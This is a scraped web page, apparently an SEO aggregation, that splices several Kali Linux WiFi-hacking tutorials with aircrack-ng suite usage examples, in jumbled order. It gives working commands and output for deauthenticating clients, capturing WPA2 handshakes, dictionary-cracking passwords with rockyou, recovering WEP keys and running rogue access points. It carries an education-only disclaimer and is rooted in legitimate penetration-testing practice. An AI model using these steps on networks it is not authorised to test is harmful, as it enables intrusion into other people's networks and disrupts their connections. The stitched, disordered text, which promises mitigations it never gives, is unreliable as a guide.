That’s great! Hacking WiFi is a fantastic exercise. It’s a chance for you to learn command line tools, wireless protocols, enumeration, and password cracking. In this article, we’ll teach all these things to you. We’ll discuss the technology, how the attacks work, and what hardware you need. Finally, we’ll set up a lab and practice it together.
So get ready because we’re going to teach you how to hack WiFi with Kali Linux.
How to Hack WiFi With Kali Linux
We’re now going to go through the step-by-step process of hacking a WPA2-Personal WiFi network.
There are several programs we can use, but this article will only focus on using the Aircrack-NG suite of tools. We encourage you to try some of the other tools mentioned in the Frequently Asked Questions.
Promiscuous Mode
In most cases, a network card only listens for traffic sent to its MAC Address. Promiscuous mode (also called monitor mode) tells the card to listen to all traffic, not just traffic directed to it.
Let’s switch to root using the command
sudo su
. You will be prompted for your Kali password.
Use
ifconfig
to see what our network card is. We see below it’s wlan0.
Using
iwconfig
we see the adapter is currently in managed mode (not monitor).
We will use Airmon-NG to set the adapter to monitor mode enabled.
First, we end any processes that might interfere using the command
airmon-ng check kill
Then change the adapter’s mode using
airmon-ng start wlan0
Use whatever your adapter name is, if different. Your adapter name will change, adding the letters “mon” to the end (for monitor). In our case, it became wlan0mon
Scanning For Networks
Now that we are in monitor mode, we can begin scanning. We will use the program Airodump-NG, with the -i flag to indicate the interface to listen on, then the name of our interface (which in our case is wlan0mon).
airodump-ng -i wlan0mon
We are picking up all kinds of traffic. Let’s examine what we see.
- BSSID is the MAC address of the access points we can see.
- CH is the channel they are running on (WPA2 typically runs on channel 1, 6, or 11).
- ENC is the encryption method. In this picture we see two open networks, and many WPA2.
- AUTH is the authentication method used to connect to the network. PSK stands for pre-shared key.
- ESSID is the common name of the wireless network. We can see our target network, as well as the MAC address and the channel it is running on.
- STATION lists the MAC address of devices connected to the different networks.
Capturing Traffic
Now that we know our target’s BSSID, let’s capture packets only going to our target and save it as a capture file. We will use Airodump-NG again, with the –channel flag to indicate the channel to listen on, the –bsside flag to let it know what device to listen to, and the — write command to name the capture.
airodump-ng --channel 1 --bssid EC:AD:E0:AB:93:34 --write HackDump wlan0mon
All the data is now being saved to a capture file. We can see one device connected to this network (the phone we connected to this access point – connect a device if you haven’t already).
What we want to capture is a device successfully connecting to the network. We call this the handshake. The best way for us to accomplish this is to run an attack against the connected device and kick it from the network. It will attempt to reconnect, allowing us to capture the handshake.
In a new terminal, we will run Aireplay-NG using the following flags
–deauth
(we will use the number zero, which means keep attacking until we say stop)
–a
–c
And then list the interface
aireplay-ng --deauth 0 -a EC:AD:E0:AB:93:34 -c F2:98:XX:XX:XX:XX wlan0mon
After letting this run for a while, hit ctrl+c to stop the attack. In roughly 10 seconds, we had enough information in the capture to start cracking. You can also stop the packet capture in the other terminal window now.
You can see all the files that were saved. The *.cap file is the one we need.
Cracking the Password
We will use the program aircrack-ng to run a dictionary attack against the captured handshake and try to break the password. We are using the fern-wifi common password file, as mentioned earlier.
The command is:
aircrack-ng HackDump-01.cap -w /usr/share/wordlists/fern-wifi/common.txt
The cracking attempts begin. We already know the password was in this list. In under one second, Aircrack-NG tried 400 passwords and found the correct one. We now have access to this network.
airodump-ng Usage Examples
Monitor all wireless networks, frequency hopping between all wireless channels.
root@kali:~# airodump-ng wlan0mon CH 8 ][ Elapsed: 4 s ][ 2018-11-22 13:44 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 54:A0:50:DA:7B:98 -76 1 0 0 1 54e WPA2 CCMP PSK RTINC-24 FC:15:B4:CF:0A:55 -70 2 0 0 6 54e. WPA2 CCMP PSK HP-Print-55-ENVY 4500 series A8:4E:3F:73:DD:88 -67 3 0 0 6 720 WPA2 CCMP PSK WAT-73DD80 4C:8B:30:83:ED:91 -71 2 0 0 1 54e WPA2 CCMP PSK TELL-US-2.4G 4C:8B:30:D7:09:41 -76 2 0 0 1 54e WPA2 CCMP PSK SAMUELL-2.4G FA:8F:CA:89:90:39 -82 2 0 0 1 135 OPN Raymond's TV.e102 AC:20:2E:CD:F4:88 -85 0 0 0 6 54e. WPA2 CCMP PSK BELL-CDF480 10:78:5B:2A:A1:21 -80 2 0 0 6 54e WPA2 CCMP PSK COGECO-2.4G BSSID STATION PWR Rate Lost Frames Probe (not associated) 8C:85:90:0C:C5:D0 -44 0 - 1 1 5 (not associated) A0:63:91:43:C2:D5 -70 0 - 1 0 1 TT-D59979 (not associated) 14:91:82:04:D9:74 -43 0 - 1 0 1 1
Sniff on channel 6 (-c 6) via monitor mode interface wlan0mon and save the capture to a file (-w /root/chan6).
root@kali:~# airodump-ng -c 6 -w /root/chan6 wlan0mon CH 6 ][ Elapsed: 8 s ][ 2017-11-12 13:49 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BC:4D:FB:2C:6D:88 -68 28 9 3 0 6 54e. WPA2 CCMP PSK BELL-CDF4800 A8:4E:3F:73:DD:88 -74 33 19 0 0 6 54e. WPA2 CCMP PSK COGECO-2.4G FC:15:B4:CF:0A:55 -77 61 31 0 0 6 54e. WPA2 CCMP PSK HP-Print-55-ENVY 4500 series
Filter for access points by a specific manufacturer, specifying the OUI and mask (-d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00).
root@kali:~# airodump-ng -d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00 wlan0mon CH 14 ][ Elapsed: 18 s ][ 2018-11-22 13:53 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID FC:15:B4:CF:0A:55 -76 9 0 0 6 54e. WPA2 CCMP PSK HP-Print-55-ENVY 4500 series BSSID STATION PWR Rate Lost Frames Probe
How to Crack WPA2
Wi-Fi can use a number of various protocols to give you a secure internet connection. From the least to most secure, they are:
- Open
- WEP (Wired Equivalent Privacy)
- WPA2 (Wi-Fi Protected Access 2)
- WPA3 (Wi-Fi Protected Access 3)
An open network is pretty much as the name implies – open. It has no password and practically anyone can connect to it.
WEP is an old protocol, rarely in use and requires a password like its successors.
WPA2 is the most commonly used protocol around the world. WPA3 is a newest and the most secure protocol known till date. But it is rarely used and only available on newer devices.
Prerequisites
Wi-Fi works by constantly sending packets of data to your authenticated device. In order to hack it, you’ll need:
- A Linux machine (Preferably Kali Linux)
- A wireless adapter
To install Kali from scratch, you can follow this tutorial.
If you haven’t already, you’ll need to install a tool called Aircrack-ng on your machine. To install it, just type in the command below.
sudo apt install aircrack-ng
How to Put the Network Card into Monitor Mode
You first want to get information about the target. This is what hackers call reconnaissance.
In order to do that you need to first change your wireless card from ‘managed’ mode to ‘monitor’ mode. This will turn it from a mere network card to a wireless network reader.
First you need to find out the name of your wireless card. Plug in your adapter and run the
iwconfig
command to find out. It’s usually the last one on the list.
As you can see, mine is
wlan1
. Now run the following commands:
sudo airmon-ng check rfkillsudo airmon-ng start
sudo
indicates the need for root privileges,
check rfkill
stops processes that could hinder the card from going into monitor mode, and
start
tells airmon-ng which network card to execute on. Replace the with the name of your wireless card.
airmon-ng
is a script that instantly changes your card to monitor mode. You actually can do this manually or make a script of your own but I personally prefer something rather simple.
How to Look for the Target
To see what networks are around you, run the following command:
sudo airodump-ng
airodump-ng
is a part of the
aircrack-ng
suite that allows a network card to view the wireless traffic around it.
As you can see we get a lot of information. But let’s take a quick look at the ESSID (Extended Service Set Identifier) column. Also known as the AP (Access Point) name, this column shows the name of the target network, which in my case will be ‘Asteroid’.
You want to concentrate on the target AP and ignore the rest. To do this, press Ctrl+C to cancel the current scan and this time, append the bssid of the network with the bssid flag as shown below.
sudo airodump-ng
--bssid
The BSSID stands for Basic Service Set Identifier, a fancy name for the MAC address of the device. You use it to identify the device on a network, along with the ESSID (Name of the AP). Technically, you could just use the ESSID flag instead but different APs could have the same name. However, no two APs can ever have the same BSSID.
Below is a code snippet of what you would type to get info about the AP using the ESSID only.
sudo airodump-ng
--bssid
Note: If the name has a space, enclose it with quotes. For example,
--bssid “Asteroid 1”
.
You’ll notice I highlighted the MAC address of a client connected to the AP under the ‘Station’ column. To its left is the MAC address of the AP it is connected to.
How to Capture the Handshake Packets
The next step is to capture the handshake packets (Remember packets? 👀). Handshake packets are the first four packets sent from the AP when an authenticated device connects to an AP.
This means we have two options:
- Wait for a device to connect to the AP
- De-authenticate the device and then let it connect to the AP
The second one sounds a lot more fun so let’s go for it.
How to Perform a DOS Attack
You can use
aireplay-ng
or
mdk4
to disconnect devices from APs for a time. This is called a de-authentication attack or a wireless DOS (Denial-Of-Service) attack.
Now here’s the game plan:
- Setup airodump-ng to capture packets and save them
- De-authenticate the device for some time while airodump-ng is running
- Capture the handshake
Got all that? Good. Let’s roll. 👨💻👩💻
First, run the command to capture and save packets:
sudo airodump-ng -c
--bssid
-w
Here, we’re using the
-c
flag to specify the channel to search, the
--bssid
flag for the MAC address of the AP, and the
-w
flag to give a path you want to save the captured packets to.
Quick lesson: Channels reduce the chances of APs interfering with each other. When running
airodump-ng
, you can identify the channel number under the CH column.
While that is running, you’re going to run your de-authentication attack against the device connected to it using the command:
sudo aireplay-ng -a
--deauth
The
-a
flag specifies the MAC address of the AP,
--deauth
specifies how long you want the attack to run in seconds, followed up by the network card.
A de-authentication attack involves using your own network card to send packets to interrupt communication between the AP and the client. It’s not perfect and sometimes the client may connect back, but only for a short time.
If your Wi-Fi is acting crazy and you seem to be disconnecting and connecting randomly back to it, you may be experiencing a de-authentication attack.
In the command above, you’re targeting the AP and running the attack. Note that you can instead attack any device connected to the AP and you should get the same result. All you need to do is to change the
-a
flag to the MAC address of any device connected.
While the DOS attack is underway, check on your airodump scan. You should see at the right top :
WPA handshake:
. Once you have verified that, you can stop the replay attack and the
airodump-ng
scan.
How to Obtain the Password (Hopefully)
In the final steps, you are going to run a bunch of generated Pairwise Master Keys (PMKs) against the captured packets to get the password. Let me break it down.
A PMK is basically an algorithmic combination of a word and the APs name. Our intention is to continuously generate PMKs using a wordlist against the handshake. If the PMK is valid, the word used to generate it is the password. If the PMK is not valid, it skips to the next word on the list.
I’m going to use the rockyou wordlist located in the
/usr/share/wordlists
directory. I think this is only found in Kali so if you have a different OS, you might make one of your own manually or generate one using
crunch
.
If it isn’t already extracted, just run the command:
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
Quick history lesson: The rockyou wordlist is a bunch of passwords gotten from one of the most infamous cybersecurity data breaches that affected a company of the same name. It contains approximately 14 million unique passwords that were used in over 32 million accounts and as such, is one of the most dependable wordlists on the planet.
Now run the command:
sudo aircrack-ng
-w
Alright, everyone – mission accomplished 😎.
The password was, well… ‘password’. Pretty disappointing from a security perspective, but I set this network up just for fun for the purposes of this tutorial. In reality, this could take minutes to hours depending on the length and strength of the password.
To clean up, simply remove the file captures, close your terminals, and run the command
service NetworkManager restart
to change your network card back to managed mode so you can connect to the Wi-Fi.
wpaclean Usage Example
Parse the provided capture files (
wpa-psk-linksys.cap wpa.cap
) and save any 4-way handshakes to a new file (
/root/handshakes.cap
):
root@kali:/usr/share/doc/aircrack-ng/examples# wpaclean /root/handshakes.cap wpa-psk-linksys.cap wpa.cap Pwning wpa-psk-linksys.cap (1/2 50%) Net 00:0b:86:c2:a4:85 linksys Pwning wpa.cap (2/2 100%) Net 00:0d:93:eb:b0:8c test Done
Conclusion
This example was under ideal conditions. We knew the password was on our short list. In real life, you will likely be building your own password lists based on what you know of the target. You may also need to take other measures, such as spoofing your MAC Address to bypass whitelisting.
Still, this exercise proves that wireless networks are only as secure as the passwords you choose. Even with very secure passwords, other ways exist to infiltrate a network. We didn’t touch on hacking WPS, which can be a quicker method to gain access, or setting up an evil twin to try and social engineer credentials.
There are many different methods to hack WiFi, and we encourage you to test out different methods and programs. Check out our Member Section to see all our course offerings. You might especially like the ones below.
Welcome to the world of Wi-Fi hacking, everybody. 💻.
In my previous article, we talked about some basic Linux skills and tricks. In this article you are going to learn a basic Wi-Fi hacking procedure using those skills.
You’ll learn things such as how to:
- Monitor Wi-Fi networks around you
- Perform a DOS attack
- Protect yourself against Wi-Fi attacks
Disclaimer: This is strictly for educational purposes only (and, of course, for a little fun). Do not under any circumstances, conditions, or influence of unwise friends use the hacks you learn here on organisations, individuals, or your probably annoying neighbour. You would be committing a crime and you’ll either be fined, sent to jail, or just get your parents embarrassed.
And now that we have that lovely introduction out of the way, let’s proceed.🙃
ivstools Usage Examples
Strip out the initialization vectors of the provided .pcap capture and save them to a new file:
root@kali:~# ivstools --convert wep_64_ptw.cap out.ivs Opening wep_64_ptw.cap Creating out.ivs Read 65282 packets. Written 30566 IVs. Merge all .ivs files into one file.
root@kali:~# ivstools --merge *.ivs /root/all-ivs.ivs Creating /root/all-ivs.ivs Opening out.ivs 916996 bytes written Opening out2.ivs 1374748 bytes written
easside-ng Usage Example
First, run buddy-ng, then launch the Easside-ng attack, specifying as many of the options as you can.
root@kali:~# buddy-ng Waiting for connexion
root@kali:~# easside-ng -v de:ad:be:ef:ca:fe -m 3c:46:d8:4e:ef:aa -s 127.0.0.1 -f wlan0mon -c 6 Setting tap MTU Sorting out wifi MAC
makeivs-ng Usage Example
Specify a BSSID (
-b de:ad:be:ef:ca:fe
), WEP key (
-k 123456789ABCDEF123456789AB
), and output filename (
-w makeivs.ivs
):
root@kali:~# makeivs-ng -b de:ad:be:ef:ca:fe -k 123456789ABCDEF123456789AB -w makeivs.ivs Creating 100000 IVs with 16 bytes of keystream each. Estimated filesize: 2.29 MB Using fake BSSID DE:AD:BE:EF:CA:FE Done.
root@kali:~# aircrack-ng makeivs.ivs Opening makeivs.ivs Read 100001 packets. # BSSID ESSID Encryption 1 DE:AD:BE:EF:CA:FE WEP (100000 IVs) Choosing first network as target. Opening makeivs.ivs Attack will be restarted every 5000 captured ivs. Starting PTW attack with 100000 ivs. Aircrack-ng 1.2 rc4 [00:00:00] Tested 621 keys (got 100000 IVs) KB depth byte(vote) 0 1/ 2 76(113152) 1E(111104) 48(109824) 1C(109568) A6(109568) 1 1/ 3 F5(112640) 06(111616) 33(111616) F4(111616) 05(111104) 2 0/ 2 31(137216) F9(113664) 76(113152) DC(110336) B9(109568) 3 10/ 3 E1(108800) 0A(108544) 34(108032) 3E(108032) 48(108032) 4 9/ 4 7D(109312) BA(109056) 5E(108800) D6(108800) 11(108288) KEY FOUND! [ 12:34:56:78:9A:BC:DE:F1:23:45:67:89:AB ] Decrypted correctly: 100%
Introduction
Wireless Fidelity (Wi-Fi) is a common technology many of us use in our daily lives. Wether it’s at school, home, or simply bingeing Netflix, it’s increasingly rare to see anyone carry out Internet related activities without it.
But have you ever tried to hack Wi-Fi? 🤔 (I’m sure you’ve been tempted 😏).
In order to hack something, you need to know how it works. This means you need to understand how the tech works in the first place. So let’s start from the basics: The Packet.
airserv-ng Usage Example
Start a server instance on a specific port (
-p 4444
) using the
wlan0mon
interface on channel 6 (
-c 6
).
root@kali:~# airserv-ng -p 4444 -d wlan0mon -c 6 Opening card wlan0mon Setting chan 6 Opening sock port 4444 Serving wlan0mon chan 6 on port 4444
What We’ll Cover:
Here’s a basic rundown of what this tutorial contains:
- Introduction
- What is a Packet?
-
How to Crack WPA2
- Prerequisites
- How to put the network card into monitor mode
- How to look for the target
- How to capture the handshake packets
- How to perform a DOS attack
- How to obtain the password (hopefully)
- Mitigations Against WiFi Attacks
- Conclusion
airbase-ng Usage Examples
Hirte Attack – Access Point Mode
The Hirte attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (
-c 6
) with the specified ESSID (
-e TotallyNotATrap
) and uses the cfrag WEP attack (
-N
), setting the WEP flag in the beacons (
-W 1
).
root@kali:~# root@kali:~# airbase-ng -c 6 -e TotallyNotATrap -N -W 1 wlan0mon 15:51:11 Created tap interface at0 15:51:11 Trying to set MTU on at0 to 1500 15:51:11 Trying to set MTU on wlan0mon to 1800 15:51:11 Access Point with BSSID 3C:46:D8:4E:EF:AA started.
Caffe Latte Attack – Access Point Mode
As with the Hirte attack, the Caffe Latte Attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (
-c 6
) with the specified ESSID (
-e AlsoNotATrap
) and uses the Caffe Latte WEP attack (
-L
), setting the WEP flag in the beacons (
-W 1
).
root@kali:~# airbase-ng -c 6 -e AlsoNotATrap -L -W 1 wlan0mon 15:56:05 Created tap interface at0 15:56:05 Trying to set MTU on at0 to 1500 15:56:05 Access Point with BSSID 3C:46:D8:4E:EF:AA started.
aireplay-ng Usage Examples
Injection Test
Run the injection test (
-9
) via the monitor mode interface
wlan0mon
.
root@kali:~# aireplay-ng -9 wlan0mon 22:55:44 Trying broadcast probe requests... 22:55:44 Injection is working! 22:55:46 Found 4 APs 22:55:46 Trying directed probe requests... 22:55:46 24:FB:95:FD:3D:7F - channel: 6 - 'America' 22:55:52 30/30: 100% 22:55:52 34:6D:A0:CD:45:10 - channel: 6 - 'ATT2b8i4UD' 22:55:58 27/30: 90% 22:55:58 50:64:3D:2A:F7:A0 - channel: 6 - 'FBI surveillance van' 22:56:04 12/30: 40% 22:56:04 16:6E:EF:29:67:46 - channel: 6 - 'dd-wrt_vap' 22:56:10 1/30: 3%
Deauthentication Attack
Run the deauthentication attack (
-0
), sending packets to the wireless access point (
-a 8C:7F:3B:7E:81:B6
) to deauthenticate a wireless client (
-c 00:08:22:B9:41:A1
) via the monitor mode interface
wlan0mon
.
root@kali:~# aireplay-ng -0 5 -a 8C:7F:3B:7E:81:B6 -c 00:08:22:B9:41:A1 wlan0mon 12:41:56 Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6 12:41:57 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs] 12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs] 12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs] 12:41:59 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs] 12:42:00 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
Fake Authentication
Run the fake authentication attack and re-authenticate every 6000 seconds (
-1 6000
) against the access point (
-a F0:F2:49:82:DF:3B
) with the given ESSID (
-e FBI-Van-24
), specifying our mac address (
-h 3c:46:d8:4e:ef:aa
), using monitor mode interface
wlan0mon
.
root@kali:~# aireplay-ng -1 6000 -e FBI-Van-24 -a F0:F2:49:82:DF:3B -h 3c:46:d8:4e:ef:aa wlan0mon 12:49:59 Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6 12:50:06 Sending Authentication Request (Open System)
Keywords searched by users: kali linux wifi password
Categories: Cập nhật 38 Kali Linux Wifi Password
See more here: kientrucannam.vn
See more: https://kientrucannam.vn/vn/